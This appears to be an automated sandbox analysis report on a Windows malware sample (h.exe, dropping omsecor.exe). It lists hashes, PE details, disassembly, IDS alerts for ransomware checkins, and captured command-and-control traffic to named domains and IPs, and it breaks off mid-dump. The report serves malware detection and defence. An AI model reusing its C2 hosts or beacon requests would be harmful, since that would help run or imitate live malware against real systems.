        CbHvTrpv0C.elfGet hashmaliciousMirai, MoobotBrowse
        • 157.24.32.8
        huhu.arm7.elfGet hashmaliciousMiraiBrowse
        • 157.24.67.207
        skyljne.x86_64.elfGet hashmaliciousMiraiBrowse
        • 128.214.222.222
        oawyuZdHQO.elfGet hashmaliciousMiraiBrowse
        • 192.84.228.166
        skyljne.x86.elfGet hashmaliciousMiraiBrowse
        • 157.24.20.213
        skyljne.x86_64-20240109-1651.elfGet hashmaliciousMiraiBrowse
        • 157.24.67.220
        tdeICWuzbr.elfGet hashmaliciousMiraiBrowse
        • 157.24.20.206
        DIGITALOCEAN-ASNUShttp://104.131.132.54/dota3.tar.gzGet hashmaliciousUnknownBrowse
        • 104.131.132.54
        Chepstow Hospital 2024.htmlGet hashmaliciousUnknownBrowse
        • 178.128.135.204
        https://blueinsect-raxilaf176408090.codeanyapp.com/STR/SRT34/Get hashmaliciousUnknownBrowse
        • 45.55.112.74
        BbTm8TrVqb.exeGet hashmaliciousLummaC, AsyncRAT, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog StealerBrowse
        • 162.243.189.2
        SecuriteInfo.com.Python.CrealStealer.4.28055.30099.exeGet hashmaliciousCreal StealerBrowse
        • 159.89.102.253
        ghdfg64.exeGet hashmaliciousCreal StealerBrowse
        • 159.89.102.253
        java.exeGet hashmaliciousTinbaBrowse
        • 178.62.201.34
        toolspub1.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
        • 134.209.130.144
        python.exeGet hashmaliciousCobaltStrikeBrowse
        • 159.89.124.188
        arm7.elfGet hashmaliciousMiraiBrowse
        • 157.245.182.60
        ATGS-MMD-ASUSRainViewer-Premium-v3.6.5_build_14453-Moduserupload.in.apkGet hashmaliciousUnknownBrowse
        • 34.160.223.119
        report.htmlGet hashmaliciousUnknownBrowse
        • 34.160.15.205
        file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
        • 34.160.144.191
        file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
        • 34.160.144.191
        https://resources.hracuity.com/e3t/Ctc/DJ+113/clD6s04/VVrjdY446B4bW4sbZ6y8N-yz0W3S9mTt58tvldN5t-nks3qgyTW7lCdLW6lZ3kvW2P4GsF2t8vK6W5LZC7l60ZQKnVS3zJM5lcSDNW61nRpv24Rtd1W6Rk6Ks1gsjMsW3xYx3d5kSWqsV6s_CQ841sRNW1ZkSQ717TgCsW7NBz_Y5stDqyW8tMtWV7NncJPW3cd7Jz2xRLWqW5s48Qn5fn3FRW8bCMnJ2RN4mgW4BZdCB67szJ8W7v2lk3595CCZW3kRsms8zsJQZW8n6-SF2QNBfyN4DgMrSwQMLcW84XP1Z517CnTV4nsjG65mNN1W4d9BjL4yT33zW7qxJkd94SDlBV2BhwT2hkrdgW7M37Vk72jtl_cDZlW04Get hashmaliciousUnknownBrowse
        • 34.148.82.226
        https://resources.hracuity.com/e3t/Ctc/DJ+113/clD6s04/VVrjdY446B4bW4sbZ6y8N-yz0W3S9mTt58tvldN5t-nkM3qgyTW7Y8-PT6lZ3mYW2q_qQC7d960XW4r_9Sh62x9qDW6S-3R53kdRxRW1bx4Cv4-v_K_N71VMjpD7BGGVkcQtt6l5dB3W6vjLT76p64x_N6VlNQyMc1ftW1GY7Xj53X05vW1rR2FF7LnrckW2YQZfH7BcCBrW7RPCwB82M0qGW4lWpbk1Hk4t4W7n4wvR3Nr_MyW27zQn33dqcQfN9211v-58wwLW2rK8XL1fP5LPVlRVQ62QYdLcW9dWRWC6mN-LxW4B8CBg7SmYJ5W21tbpW7Q9xLNW1JpsSk3VSQk1W6v9H0S4ZdMqXW98BKbK7gG5bhW3z4dRC3ftVbYN7YCVDk3BwTwf40qsP-04Get hashmaliciousUnknownBrowse
        • 34.148.82.226
        file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
        • 34.149.100.209
        wjdntZ2nr8.elfGet hashmaliciousMiraiBrowse
        • 32.237.62.92
        qPs4EdUWTu.elfGet hashmaliciousMiraiBrowse
        • 48.178.146.93
        Chepstow Hospital 2024.htmlGet hashmaliciousUnknownBrowse
        • 34.149.20.76
        No context
        No context
        Process:C:\Users\user\Desktop\h.exe
        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):83656
        Entropy (8bit):5.504342817449818
        Encrypted:false
        SSDEEP:1536:zd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZTl/5:zdseIOMEZEyFjEOFqTiQm5l/5
        MD5:77F1965059059CE58EC10CCA09F566D1
        SHA1:C61B9B3AAB3AA507A3EE336461FD2E830D945114
        SHA-256:FD4E86ECBBD5EC2A8CA8DB25FDDF253B554C7AC741A157E55D13BD71804FF1BF
        SHA-512:1AF2AC4B0A003CC314BB002F5E0CA966C8113979230892726C2C1FA7D07A4A379E40F4128E1B865315362EE5B91FD2D3BB59A671E7DFF76BA527BD335DA61E11
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 100%
        Reputation:low
        Preview:MZE....S..g.!.M..d-......<ZsO....hv.p.p..Wz...6H].."|.....T...VcT4..h#y~.,{.=\CJ..z....../..X?.........;(..r..r....0..`..f..NJ..[..T..............kw..n.v...>..#... ..h.P..0.%...v...oN.Z.,......>.......r......PE..L......P............................F.............@.........................................................................|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\AppData\Roaming\omsecor.exe
        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):83656
        Entropy (8bit):5.504323033316674
        Encrypted:false
        SSDEEP:1536:hd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZTl/5:RdseIOMEZEyFjEOFqTiQm5l/5
        MD5:5A37340FA852E5184BBBA4134E60B591
        SHA1:6A610FA400079B14BD2D3991CE82D350F555D389
        SHA-256:E45A0C0380FB7DBF146E5F1FC94D2D8371DF7435F25D06BC42EC196EA2139336
        SHA-512:D9C30BBDE5F3DEA98C884E1DA4A40ABEA9BBA3BA65B7DD693B086DF9270354CB42BA693CE6B8F46F983D5664BC6D4936904C1863EB1870FE2A2AAD0EB503CF8A
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 100%
        Reputation:low
        Preview:MZE....S..g.!.M..d-......<ZsO....hv.p.p..Wz...6H].."|.....T...VcT4..h#y~.,{.=\CJ..z....../..X?.........;(..r..r....0..`..f..NJ..[..T..............kw..n.v...>..#... ..h.P..0.%...v...oN.Z.,......>.......r......PE..L......P............................F.............@.........................................................................|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
        File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):5.5043600364153455
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.98%
        • DOS Executable Generic (2002/1) 0.02%
        File name:h.exe
        File size:83'656 bytes
        MD5:564451e54fa0196acd2fd7f771e5ed1c
        SHA1:fd0a26fea635276bc7b54d572f2dbeb7bfd2e1fc
        SHA256:3e4a9ecdc59ebcf0941aa0c37a6704ddfe15eadcc3f16d1023132445736df30f
        SHA512:de484a3801c207fae371db1133cff341d258a3ea531e2f8783944050f10aedf933c5c8a40d0515fb7ec85baad37ddea134495baaa3d6b83eeee36e3cc27d39e7
        SSDEEP:1536:Kd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZTl/5:KdseIOMEZEyFjEOFqTiQm5l/5
        TLSH:B4838D97B7E6C076E2930AB0267D9591DAFEBD7412E1C2CBC7001C477EA4292C635B87
        File Content Preview:MZE.....S...g.!.M...d-......<ZsO....hv.p.p..Wz.....6H]...."|.....T...VcT4..h#y~.,{.=\CJ..z....../..X?.........;(..r..r......0..`..f..NJ....[..T................kw..n.v...>..#... ...h.P..0.%...v....oN.Z.,......>.......r.......PE..L......P...................
        Icon Hash:00928e8e8686b000
        Entrypoint:0x40b346
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:
        Time Stamp:0x50B280D5 [Sun Nov 25 20:34:29 2012 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:08b67a9663d3a8c9505f3b2561bbdd1c
        Instruction
        push ebp
        mov ebp, esp
        mov eax, 00001800h
        call 00007FC890D29432h
        push ebx
        push esi
        push edi
        mov edi, dword ptr [0040E0B0h]
        mov esi, 00000400h
        push esi
        lea eax, dword ptr [ebp-00000800h]
        push eax
        xor ebx, ebx
        push ebx
        call edi
        push 0040F4FCh
        lea eax, dword ptr [ebp-00000800h]
        call 00007FC890D212EAh
        test eax, eax
        pop ecx
        je 00007FC890D2722Fh
        lea eax, dword ptr [ebp-00001800h]
        push eax
        call 00007FC890D26A66h
        test eax, eax
        pop ecx
        jne 00007FC890D2721Eh
        push esi
        lea eax, dword ptr [ebp-00000800h]
        push eax
        push ebx
        call edi
        push 00000001h
        lea eax, dword ptr [ebp-00000800h]
        push eax
        push 0040F414h
        push 0040F1D8h
        push 80000001h
        call 00007FC890D22816h
        add esp, 14h
        test eax, eax
        push 00000004h
        je 00007FC890D271D7h
        push ebx
        push 00000003h
        jmp 00007FC890D271DBh
        call dword ptr [0040E064h]
        push eax
        push 00000006h
        call 00007FC890D26583h
        add esp, 0Ch
        call 00007FC890D270C3h
        call 00007FC890D268EDh
        test eax, eax
        jne 00007FC890D271C4h
        call 00007FC890D26963h
        test eax, eax
        je 00007FC890D27233h
        push 00002710h
        call dword ptr [0040E070h]
        push 00000004h
        push ebx
        push 00000009h
        call 00007FC890D26554h
        add esp, 0Ch
        push esi
        lea eax, dword ptr [ebp+00000000h]
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0xf77c0xb4.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6a80x40.rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0xe0000x1b4.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000xcc180xce007d17b3af3ad18f4a94d7ab9fe07eac18False0.5967650182038835data6.6299319364593226IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0xe0000x21440x220074f4ab6d225e1f74a6f3100bfbf96df3False0.4476102941176471data4.463727229154835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x110000x1712c0x2009159e4683d74ea27f29c3b096294f663False0.466796875data3.7016590486098133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        DLLImport
        WININET.dllHttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
        SHLWAPI.dllStrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
        KERNEL32.dllTerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
        USER32.dllGetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
        ADVAPI32.dllRegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
        SHELL32.dllSHGetFolderPathW
        ole32.dllCoCreateInstance, OleInitialize, CoInitialize
        OLEAUT32.dllSysFreeString, VariantInit, SysAllocString, VariantClear
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        34.41.229.245192.168.2.780497092037771 01/23/24-13:39:19.732410TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804970934.41.229.245192.168.2.7
        192.168.2.734.41.229.24549709802015786 01/23/24-13:39:19.422200TCP2015786ET TROJAN Ransom.Win32.Birele.gsg Checkin4970980192.168.2.734.41.229.245
        192.168.2.7193.166.255.17149699802015786 01/23/24-13:38:35.744468TCP2015786ET TROJAN Ransom.Win32.Birele.gsg Checkin4969980192.168.2.7193.166.255.171
        192.168.2.764.225.91.7349713802015786 01/23/24-13:40:05.584888TCP2015786ET TROJAN Ransom.Win32.Birele.gsg Checkin4971380192.168.2.764.225.91.73
        192.168.2.764.225.91.7349708802015786 01/23/24-13:39:18.638291TCP2015786ET TROJAN Ransom.Win32.Birele.gsg Checkin4970880192.168.2.764.225.91.73
        TimestampSource PortDest PortSource IPDest IP
        Jan 23, 2024 13:38:35.521198988 CET4969980192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:35.743880987 CET8049699193.166.255.171192.168.2.7
        Jan 23, 2024 13:38:35.744004011 CET4969980192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:35.744467974 CET4969980192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:35.966620922 CET8049699193.166.255.171192.168.2.7
        Jan 23, 2024 13:38:35.966653109 CET8049699193.166.255.171192.168.2.7
        Jan 23, 2024 13:38:36.080274105 CET4970080192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:37.093519926 CET4970080192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:39.109201908 CET4970080192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:43.109143972 CET4970080192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:51.109131098 CET4970080192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:57.126569033 CET4970780192.168.2.7193.166.255.171
        Jan 23, 2024 13:38:58.140469074 CET4970780192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:00.140491962 CET4970780192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:04.140392065 CET4970780192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:12.140450954 CET4970780192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:18.480215073 CET4970880192.168.2.764.225.91.73
        Jan 23, 2024 13:39:18.637645006 CET804970864.225.91.73192.168.2.7
        Jan 23, 2024 13:39:18.637798071 CET4970880192.168.2.764.225.91.73
        Jan 23, 2024 13:39:18.638290882 CET4970880192.168.2.764.225.91.73
        Jan 23, 2024 13:39:18.795526981 CET804970864.225.91.73192.168.2.7
        Jan 23, 2024 13:39:18.797132015 CET804970864.225.91.73192.168.2.7
        Jan 23, 2024 13:39:18.797214031 CET4970880192.168.2.764.225.91.73
        Jan 23, 2024 13:39:19.096178055 CET4970980192.168.2.734.41.229.245
        Jan 23, 2024 13:39:19.411546946 CET804970934.41.229.245192.168.2.7
        Jan 23, 2024 13:39:19.412636995 CET4970980192.168.2.734.41.229.245
        Jan 23, 2024 13:39:19.422199965 CET4970980192.168.2.734.41.229.245
        Jan 23, 2024 13:39:19.707097054 CET804970934.41.229.245192.168.2.7
        Jan 23, 2024 13:39:19.732409954 CET804970934.41.229.245192.168.2.7
        Jan 23, 2024 13:39:19.732426882 CET804970934.41.229.245192.168.2.7
        Jan 23, 2024 13:39:19.732510090 CET4970980192.168.2.734.41.229.245
        Jan 23, 2024 13:39:19.855705976 CET4970980192.168.2.734.41.229.245
        Jan 23, 2024 13:39:20.095356941 CET4970880192.168.2.764.225.91.73
        Jan 23, 2024 13:39:20.161643028 CET804970934.41.229.245192.168.2.7
        Jan 23, 2024 13:39:22.676857948 CET4971080192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:23.688195944 CET4971080192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:25.687295914 CET4971080192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:29.687279940 CET4971080192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:37.687366009 CET4971080192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:44.240858078 CET4971280192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:45.249797106 CET4971280192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:47.265419006 CET4971280192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:51.265537977 CET4971280192.168.2.7193.166.255.171
        Jan 23, 2024 13:39:59.281160116 CET4971280192.168.2.7193.166.255.171
        Jan 23, 2024 13:40:05.426767111 CET4971380192.168.2.764.225.91.73
        Jan 23, 2024 13:40:05.584170103 CET804971364.225.91.73192.168.2.7
        Jan 23, 2024 13:40:05.584489107 CET4971380192.168.2.764.225.91.73
        Jan 23, 2024 13:40:05.584887981 CET4971380192.168.2.764.225.91.73
        Jan 23, 2024 13:40:05.742047071 CET804971364.225.91.73192.168.2.7
        Jan 23, 2024 13:40:05.743979931 CET804971364.225.91.73192.168.2.7
        Jan 23, 2024 13:40:05.744055986 CET4971380192.168.2.764.225.91.73
        Jan 23, 2024 13:40:05.865480900 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:06.874815941 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:07.206876040 CET804971434.41.229.245192.168.2.7
        Jan 23, 2024 13:40:07.207031965 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:07.207370043 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:10.202997923 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:13.203010082 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:19.204269886 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:31.218717098 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:39.407463074 CET4971480192.168.2.734.41.229.245
        Jan 23, 2024 13:40:39.519112110 CET4971580192.168.2.7193.166.255.171
        Jan 23, 2024 13:40:40.515788078 CET4971580192.168.2.7193.166.255.171
        Jan 23, 2024 13:40:42.515491962 CET4971580192.168.2.7193.166.255.171
        TimestampSource PortDest PortSource IPDest IP
        Jan 23, 2024 13:38:35.330364943 CET5909753192.168.2.71.1.1.1
        Jan 23, 2024 13:38:35.480412960 CET53590971.1.1.1192.168.2.7
        Jan 23, 2024 13:39:18.270117998 CET6255753192.168.2.71.1.1.1
        Jan 23, 2024 13:39:18.478317976 CET53625571.1.1.1192.168.2.7
        Jan 23, 2024 13:39:18.910788059 CET5150453192.168.2.71.1.1.1
        Jan 23, 2024 13:39:19.094268084 CET53515041.1.1.1192.168.2.7
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jan 23, 2024 13:38:35.330364943 CET192.168.2.71.1.1.10xdfbfStandard query (0)lousta.netA (IP address)IN (0x0001)false
        Jan 23, 2024 13:39:18.270117998 CET192.168.2.71.1.1.10x199bStandard query (0)mkkuei4kdsz.comA (IP address)IN (0x0001)false
        Jan 23, 2024 13:39:18.910788059 CET192.168.2.71.1.1.10x2e38Standard query (0)ow5dirasuek.comA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jan 23, 2024 13:38:35.480412960 CET1.1.1.1192.168.2.70xdfbfNo error (0)lousta.net193.166.255.171A (IP address)IN (0x0001)false
        Jan 23, 2024 13:39:18.478317976 CET1.1.1.1192.168.2.70x199bNo error (0)mkkuei4kdsz.com64.225.91.73A (IP address)IN (0x0001)false
        Jan 23, 2024 13:39:19.094268084 CET1.1.1.1192.168.2.70x2e38No error (0)ow5dirasuek.com34.41.229.245A (IP address)IN (0x0001)false
        • lousta.net
        • mkkuei4kdsz.com
        • ow5dirasuek.com
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.749699193.166.255.171801228C:\Users\user\AppData\Roaming\omsecor.exe
        TimestampBytes transferredDirectionData
        Jan 23, 2024 13:38:35.744467974 CET186OUTGET /650/534.html HTTP/1.1
        From: 133504871133179231
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858
        Host: lousta.net
        Connection: Keep-Alive


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.74970864.225.91.73801228C:\Users\user\AppData\Roaming\omsecor.exe
        TimestampBytes transferredDirectionData
        Jan 23, 2024 13:39:18.638290882 CET191OUTGET /470/855.html HTTP/1.1
        From: 133504871133179231
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858
        Host: mkkuei4kdsz.com
        Connection: Keep-Alive
        Jan 23, 2024 13:39:18.797132015 CET816INHTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Tue, 23 Jan 2024 12:39:18 GMT
        content-type: text/html
        content-length: 593
        last-modified: Wed, 22 Feb 2023 21:25:52 GMT
        etag: "63f68860-251"
        accept-ranges: bytes
        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 61 74 61 29 0a 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 65 72 72 6f 72 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 74 72 69 65 73 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 72 69 65 73 2d 2d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 72 65 74 72 79 2c 20 69 6e 74 65 72 76 61 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 45 72 72 6f 72 3a 20 22 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.74970934.41.229.245801228C:\Users\user\AppData\Roaming\omsecor.exe
        TimestampBytes transferredDirectionData
        Jan 23, 2024 13:39:19.422199965 CET190OUTGET /92/650.html HTTP/1.1
        From: 133504871133179231
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858
        Host: ow5dirasuek.com
        Connection: Keep-Alive
        Jan 23, 2024 13:39:19.732409954 CET415INHTTP/1.1 200 OK
        Server: nginx
        Date: Tue, 23 Jan 2024 12:39:19 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
        Set-Cookie: snkz=81.181.57.74; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
        Data Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.74971364.225.91.73807740C:\Windows\SysWOW64\omsecor.exe
        TimestampBytes transferredDirectionData
        Jan 23, 2024 13:40:05.584887981 CET191OUTGET /569/916.html HTTP/1.1
        From: 133504915384329881
        Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24
        Host: mkkuei4kdsz.com
        Connection: Keep-Alive
        Jan 23, 2024 13:40:05.743979931 CET816INHTTP/1.1 200 OK
        server: nginx/1.18.0 (Ubuntu)
        date: Tue, 23 Jan 2024 12:40:05 GMT
        content-type: text/html
        content-length: 593
        last-modified: Wed, 22 Feb 2023 21:25:52 GMT
        etag: "63f68860-251"
        accept-ranges: bytes
        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 